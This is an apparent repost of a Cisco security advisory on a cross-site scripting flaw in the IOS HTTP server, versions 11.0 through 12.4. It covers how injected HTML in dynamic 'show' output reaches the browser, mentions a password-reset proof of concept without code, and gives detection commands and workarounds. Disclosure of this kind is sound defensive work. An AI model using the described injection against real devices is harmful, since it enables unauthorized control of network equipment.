|
|
|
|
| |
"The Cisco IOS Web browser interface (which enables the device to perform as an HTTP server) allows configuration and monitoring of a router or access server using any web browser."
Lack of user's input filtering allows attackers to add malicious code into Cisco IOS HTTP Server, allowing attackers to perform cross site scripting and executing arbitrary code on the HTTP server. |
| |
Credit:
The information has been provided by Cisco Systems Product Security Incident Response Team.
The original article can be found at: http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml
|
| |
Vulnerable Systems:
* Cisco IOS HTTP Server version 11.0 through 12.4
Immune Systems:
* Cisco IOS XR
The Cisco IOS Web browser interface (which enables the device to perform as an HTTP server) allows configuration and monitoring of a router or access server using any web browser. This feature was introduced in IOS 11.0.
A vulnerability exists in the IOS HTTP server in which HTML code inserted into dynamically generated output, such as the output from a "show buffers" command, will be passed to the browser requesting the page. This HTML code could be interpreted by the client browser and potentially execute malicious commands against the device or other possible cross-site scripting attacks. Successful exploitation of this vulnerability requires that a user browse a page containing dynamic content in which HTML commands have been injected.
In order to be vulnerable to the cross-site scripting attack, a user must browse and view the content during the same period of time the injected code exists in memory. On the other hand, if a user does not browse contaminated dynamic content on the device, then exploitation is not possible.
A proof of concept exploit exists for this vulnerability, in which the exploit attempts to reset the enable password on the device. For the attack to work against the device itself, the user browsing tainted dynamic content on the router will only be able to execute commands at or below the privilege level for which they are authenticated and authorized for on the device.
This security advisory applies to all Cisco products that run Cisco IOS Software versions 11.0 through 12.4 with the HTTP server enabled. A system which contains the IOS HTTP server or HTTP secure server, but does not have it enabled, is not affected.
To determine if the HTTP server is running on your device, issue the "show ip http server status" and "show ip http server secure status" commands at the prompt and look for output similar to:
Router>show ip http server status
HTTP server status: Enabled
If the device is not running the HTTP server, you should see output similar to:
Router>show ip http server status
HTTP server status: Disabled
Workarounds:
Disable the HTTP server:
If the HTTP server is not used for any legitimate purposes on the device, it is a best practice to disable it by issuing the following commands in configure mode:
no ip http server
no ip http secure-server
Disable the HTTP WEB_EXEC service:
A feature was introduced in 12.3(14)T and later in which selective HTTP and HTTPS services could be enabled or disabled. Two typical services are WEB_EXEC and the IOS Certificate Server (SCEP). The WEB_EXEC
service provides a facility to configure the box and retrieve current state of the box from remote clients. The IOS Certificate Server service provides a facility wherein remote clients can enroll and obtain Crypto Certificates.
It is possible to disable the WEB_EXEC service while still leaving SCEP running to serve Certificates. If an installation requires the use of the SCEP service, the WEB_EXEC service may be disabled via the commands in configure mode:
no ip http active-session-modules WEB_EXEC
no ip http secure-active-session-modules WEB_EXEC
Avoid the use of Web-based SHOW commands:
Successful exploitation of this vulnerability requires an unsuspecting user to request dynamic content from the device via the "show" commands which are available. Avoiding the use of those commands via the web interface until an upgrade to fixed software is possible may be perfectly legitimate for some installations.
|
|
|
|
|
|
|
|
|
|
